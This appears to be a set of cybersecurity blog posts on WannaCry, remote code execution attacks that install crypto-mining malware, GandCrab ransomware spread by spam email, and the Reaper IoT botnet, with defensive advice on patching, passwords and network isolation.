Hundreds of thousands of computers were infected by WannaCry as many compromised machines were used as servers and because of the worm or self-propagating capability of this malware. As a result, computers connected to the infected servers were also infected by the WannaCry malware.
Remote Code Execution Attacks and Cryptocurrency Mining
At the height of the cryptocurrency boom in December 2017, Imperva reported that cryptocurrency mining drove almost 90% of all remote code execution attacks.
Imperva said 88% of all remote code execution attacks in December 2017 sent a request to an external source to try to download a cryptocurrency mining malware.
“These attacks try to exploit vulnerabilities in the web application source code, mainly remote code execution vulnerabilities, in order to download and run different crypto-mining malware on the infected server,” Imperva said. “The malware usually uses all CPU computing power, preventing the CPU from doing other tasks and effectively denies service to the application’s users.”
Timely patching or timely installation of software update ranks as the top cybersecurity measure in preventing remote code execution attacks.
For instance, to prevent remote code execution via CVE-2018-8248 vulnerability, Microsoft’s June 12, 2018 security update has to be installed. In the case of WannaCry cyberattack, remote code execution via the exploitation of Microsoft Windows SMB vulnerability could have been prevented if only Microsoft’s March 2017 security update had been timely applied.
To prevent attackers trying to infect vulnerable servers with cryptocurrency mining malware, the initial attack must be blocked. As an initial attack, cybercriminals typically exploit remote code execution vulnerabilities to launch their malware, similar to what WannaCry attackers did.
If your organization is using computers or servers that are known to be using software that’s vulnerable to remote code execution, the latest vendor patch to mitigate this particular cyberattack should be timely applied.
As a rule of thumb, to significantly minimize the risk, your company must collect, analyze and act on the most recent threat intelligence. Your IT team must be equipped with the best tool to apply patches timely thus mitigating the risk of a data breach. Better yet, workstation and server patching can and should be automated to prevent remote code execution and other cyberattacks.
How to Avoid Being a Victim of Email-Based Ransomware
The latest version of the ransomware called “GandCrab” is an example of how cyber attackers bait their ransomware victims through email spam campaign.
Last month, security researchers at Fortinet observed a surge in an email spam campaign delivering the latest version of GandCrab ransomware.
GandCrab ransomware is a malicious software (malware) that encrypts files on the compromised computers, locks out users and demands a payment to decrypt or unlock the files.
How Ransomware Victims Are Baited via Email Spam Campaign
The latest version of GandCrab ransomware works by employing spam emails. While these spam emails don’t target specific individuals, it targets specific countries as emails in the US are the primary recipients of this spam campaign, followed by emails in the UK and emails in Canada.
Receivers of these spam emails are tricked into opening these malicious emails as the attackers use these subjects commonly used by people working in an organization:
Once the malware is downloaded to a compromised computer, all the files in the computer are then encrypted, preventing the user to access the files and a ransom note is posted on the computer screen.
This ransom note directs the user to a site using the TOR browser – a browser designed to protect privacy and anonymity. Once accessed, this site tells the victim that files on the compromised computer have been encrypted. The victim is asked to pay USD 800 within a certain period. If payment isn't done within the allowed period, the cost of decrypting the files is doubled.
GandCrab Ransomware Earlier Versions
The first version of GandCrab ransomware first appeared in the wild on January 30, 2018.
This early version of GandCrab ransomware was distributed as well via spam emails purporting to be invoices. The early version of GandCrab ransomware was also distributed via malicious advertisements (malvertisements) linked to malicious websites where the downloading of the GandCrab ransomware is then initiated.
Similar to the latest version of GandCrab, the first version spread into the wild and encrypts the files on the compromised computer. Instead of asking ransom payment in the form of US dollars, the first version of GandCrab asks for a ransom payment in the form of Dash cryptocurrency – the first time this cryptocurrency has been used in a ransomware campaign. In the past, ransomware attackers preferred cryptocurrencies Bitcoin and Monero as ransom payment.
According to Europol, European Union’s law enforcement agency, GandCrab ransomware is run as an affiliate program or ransomware-as-a-service. Anyone who wants to join the GandCrab affiliate program pays 30% to 40% of the ransom revenues to its creator and in return gets a full-featured web panel and technical support.
According to Check Point, as of March 13, 2018, GandCrab has infected over 50,000 computer systems and received an equivalent of USD 300,000 to USD 600,000 in ransom payments.
A tool to decrypt files encrypted by GandCrab (version 1)was developed by a combined effort of the Romanian authorities, Bitdefender and Europol and made available to the public for free.
According to Check Point, the decryptor tool wasn’t a result of a cryptographic breakthrough. It was, however, borne out of the law enforcement arm’s access to the ransomware’s master server, enabling the law enforcement arm to recover all private keys that had been used to perform the encryption made by GandCrab (version 1), evident with the decryptor tool’s dependence on an available victim ID.
Developers of GandCrab, however, regular modify the ransomware, making the decryption tool developed by the Romanian authorities, Bitdefender and Europol useless as it won't bring the files back.
Paying the ransom for the latest version of GandCrab is, therefore, not advisable as this doesn’t guarantee that the attackers have the capability or any intention to decrypt files.
Social Engineering Feature of GandCrab Ransomware
As can be gleaned from the different versions of GandCrab ransomware, social engineering is employed.
Social engineering cyberattack happens when an attacker uses a typical form of human interaction to obtain information about an organization or to compromise the organization’s computer systems.
Today’s human interaction now involves technology. Many human interactions now happen via email exchanges – a form of online communication that withstands even with the advent of new forms of communications like instant messaging, social networking and online chat.
GandCrab isn't the only ransomware that relies on spam emails for its distribution. Other notorious ransomware like Spora and Locky are also distributed through spam emails. For instance, on August 28th last year, in just a matter of 24 hours, over 23 million spam emails were sent carrying the Locky ransomware.
Interesting to note that these 3 ransomware GandCrab, Spora and Locky tricked their victims into opening email attachments laden with ransomware by using the subject “Invoice”.
Here are some of the best practices on how to avoid being a victim of email-based ransomware like GandCrab:
Reaper IoT Botnet Threatens to Take Down Websites
Reaper IoT botnet, considered as more powerful than the Mirai botnet, is spreading worldwide and threatens to take down websites.
According to Check Point researchers, the Reaper botnet already infected one million IoT devices worldwide. "So far we estimate over a million organizations have already been affected worldwide, including the US, Australia and everywhere in between, and the number is only increasing," Check Point researchers said.
Researchers at Qihoo 360 Netlab, meanwhile, reported that the number of “vulnerable devices in one c2 queue waiting to be infected” reached over 2 million.
IoT botnet refers to internet-connected smart devices which are infected by one malware and is controlled by a cyber criminal from a remote location. It’s typically used by cyber criminals to launch a distributed denial-of-service (DDoS) attack.
“In a distributed denial-of-service (DDoS) attack, an attacker may use your computer to attack another computer,” the United States Computer Emergency Readiness Team (US-CERT) defines DDoS attack. “By taking advantage of security vulnerabilities or weaknesses, an attacker could take control of your computer. He or she could then force your computer to send huge amounts of data to a website or send spam to particular email addresses.”
Infecting millions of IoT devices with a malware is a time-consuming task. Cyber criminals found a way to automate this task by creating a botnet – an army of infected IoT devices. The Reaper malware, as well as the Mirai malware, is spread by the IoT devices themselves. After infecting a particular IoT device, this infected device starts to look for other devices to infect.
The Mirai botnet in October 2016 brought down major websites – including Twitter, Spotify and Reddit – by launching a DDoS attack against the DNS infrastructure of New Hampshire-based company Dyn. Many major websites rely on Dyn’s internet infrastructure.
Reaper Botnet versus Mira Botnet
While the Reaper botnet shares similar characteristics with Mirai, it differs in many ways with the Mirai botnet. On September 30, 2016, the attacker known as “Anna-senpai” publicly released the source code of Mirai. According to Check Point and Qihoo 360 Netlab researchers, Reaper borrows some of the source code of Mirai, but this new botnet is significantly different from Mirai in several key behaviors.
Here are some of the differences between Reaper and Mirai:
1. Number of Affected IoT Devices
The first difference between the Reaper botnet and Mirai botnet is in terms of the number of affected IoT devices. Mirai affected about 500,000 IoT devices, while Reaper has infected over a million IoT devices.
2. Means of Infecting IoT Devices
Mirai was able to infect hundreds of thousands of IoT devices by exploiting the lax attitude of IoT users of not changing the factory or default login and password details. By using default login and password details, Mirai attackers were able to infect a massive number of IoT devices.
On the hand, Reaper’s means of infecting IoT are by exploiting several IoT vulnerabilities which the devices’ manufacturers may or may not have issued security updates or patches. Reaper attackers can, therefore, infect IoT devices even if a strong password is used as the means of entry to the device is by exploiting known software vulnerabilities.
According to Check Point researchers, the Reaper, for instance, infects unpatched wireless IP cameras by exploiting the “CVE-2017-8225” vulnerability.
3. Botnet Capabilities
Mirai already showed what it can do: It brought down major websites worldwide even for just a few hours. For Reaper, it’s still unclear what it wants to do. As of this writing, Reaper’s creator or creators just want (based on the code they wrote) to infect as many IoT devices without yet writing the command to attack any internet infrastructure or websites.
"It is too early to guess the intentions of the threat actors behind it, but with previous Botnet DDoS attacks essentially taking down the Internet, it is vital that organizations make proper preparations and defense mechanisms are put in place before an attack strikes," Check Point researchers said.
The sheer number of infected IoT devices by Reaper – more than twice the number of Mirai’s victims – show how powerful and devastating Reaper can do when used as a means to launch a DDoS attack.
Gartner projected that 8.4 billion IoT devices will be in use worldwide in 2017 and will reach 20.4 billion by 2020. Examples of IoT devices include security systems (alarm systems, surveillance cameras), automation devices (devices that control lighting, heating and cooling, electricity), smart appliances (refrigerators, vacuums, stoves) and wearables (fitness trackers, clothing, watches).
"As more businesses and homeowners use Internet-connected devices to enhance company efficiency or lifestyle conveniences, their connection to the Internet provides new vulnerabilities for malicious cyber actors to exploit," the US Federal Bureau of Investigation (FBI) said. "Once an IoT device is compromised, cyber criminals can facilitate attacks on other systems or networks, send spam e-mails, steal personal information, interfere with physical safety, and leverage compromised devices for participation in distributed denial of service (DDoS) attacks."
How to Block Reaper IoT Botnet
In most cases, owners of infected IoT devices are unaware that their devices are infected and are used for criminal activities, such as launching a DDoS attack. IoT users who fail to change their devices’ default login and password details, as well as by failing to apply security updates, are part of the problem for “blindly” contributing to cyber criminal activities like DDoS attacks.
Here are the top cyber security measures to stop attackers from infecting your IoT devices and turned it into a botnet:
1. Timely Apply Security Updates of IoT Software
Always apply in a timely manner all security updates issued by your IoT manufacturer.
2. Use Strong Password
While the sophisticated malware like the Reaper can bypass strong password, it still pays to use a strong password to ward off less sophisticated malware.
3. Isolate IoT devices on their own protected networks.
4. Block traffic from unauthorized IP addresses by configuring network firewalls.
5. Turn off IoT devices when not in use.
6. When buying an IoT device, look for manufacturers that offer software updates.
Steve E. Driz